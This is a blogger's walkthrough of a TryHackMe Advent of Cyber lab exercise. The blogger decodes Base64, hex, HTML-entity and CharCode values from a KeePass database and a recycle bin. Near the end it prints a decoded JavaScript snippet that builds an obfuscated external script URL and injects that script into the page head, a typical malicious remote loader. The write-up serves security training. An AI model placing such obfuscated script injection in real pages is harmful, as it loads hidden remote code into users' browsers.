TryHackMe — Advent of Cyber 2 — Day 22

Good afternoon everyone,

Today we continue the Blue Team saga. Reading through a bit, we are dealing with a KeePass password manager database and some different encoding. Anyhow, today’s intro:

“The past few days there have been strange things happening at Best Festival Company. McEager hasn’t had the time to fully investigate the compromised endpoints with everything that is going on nor does he have the time to reimage the workstations. McEager decides to log into a different workstation, one of his backup systems.

McEager logs in and to his dismay he can’t log into his password manager. It’s not accepting his master key! He notices that the folder name has been renamed to something strange.”

First we can RDP into the machine (should be fun, once again on my terrible connection..). Right away, we see this folder on the desktop, first glance it looks like the name is encoded in Base64. We will load up the CyberChef and take a look.

Looks like the Grinch has visited here, and it was Base64.

This also happens to be the master password for the KeePass database. So, let’s take a look inside there.

We have usernames and passwords for a security system, email, and elf server. Although they are encoded but they were lucky enough to leave us hints in the notes of the database.

Question 2: What is the encoding method listed as the ‘Matching ops’?

For this we need to use the magic option in Cyber Chef. It just tells us what we already know.

Question 3: What is the decoded password value of the Elf Server?

Here is the entry for the Elf Server.

Let’s just put into CyberChef and use FromHex. Easy enough.

Question 4: What is the decoded password value for ElfMail?

Let’s take a peak at the encoded password and see what it looks like.

Well, these notes give away the answer pretty easily with the CyberChef. It was an HTML Entity.

And onto the final Question: Decode the last encoded value. What is the flag?

Inside the Recycling Bin folder, we see this:

Alrighty, we have a lot more data it seems here, let’s take a better look. Once we place it into CyberChef, we can see right away, it is making a string From CharCode.

We can remove some syntax and let cyber chef do the work for us.

Now we are left with some javascript. Below, I have copied and pasted the output data for easier reading.

var somestring = document.createElement('script'); 
somestring.type = 'text/javascript'; 
somestring.async = true;somestring.src = String.fromCharCode(104, 104, 116, 116, 112, 115, 58, 47, 47, 103, 105, 115, 116, 46, 103, 105, 116, 104, 117, 98, 46, 99, 111, 109, 47, 104, 101, 97, 118, 101, 110, 114, 97, 105, 122, 97, 47);   
var alls = document.getElementsByTagName('script'); var nt3 = true;
for ( var i = alls.length; i--;) 
{ if (alls[i].src.indexOf(String.fromCharCode(49, 49, 100, 51, 50, 49, 50, 52, 52, 99, 52, 100, 54, 54, 55, 52, 52, 54, 100, 98, 102, 100, 57, 97, 51, 50, 57, 56, 97, 56, 56, 98, 56)) > -1) { nt3 = false;} } if(nt3 == true){document.getElementsByTagName("head")[0].appendChild(somestring); 
}

If we decode the the first CharCode section, we get ‘hhttps://gist.github.com/heavenraiza/’

If we decode the second section, we get a random character string:

11d321244c4d667446dbfd9a3298a88b8

I tried to decode, couldn’t figure it out. Tried to setup the whole thing wrapped in an HTML file from the output section. Couldn’t get the function to work. and since the Github page had the flag…well I stopped trying to get it to work. Anyway, that is it for today.

As always, best of luck. If you enjoy my content, feel free to add me on LinkedIn and let me know you saw the blog.

Until next time,

-3lduderino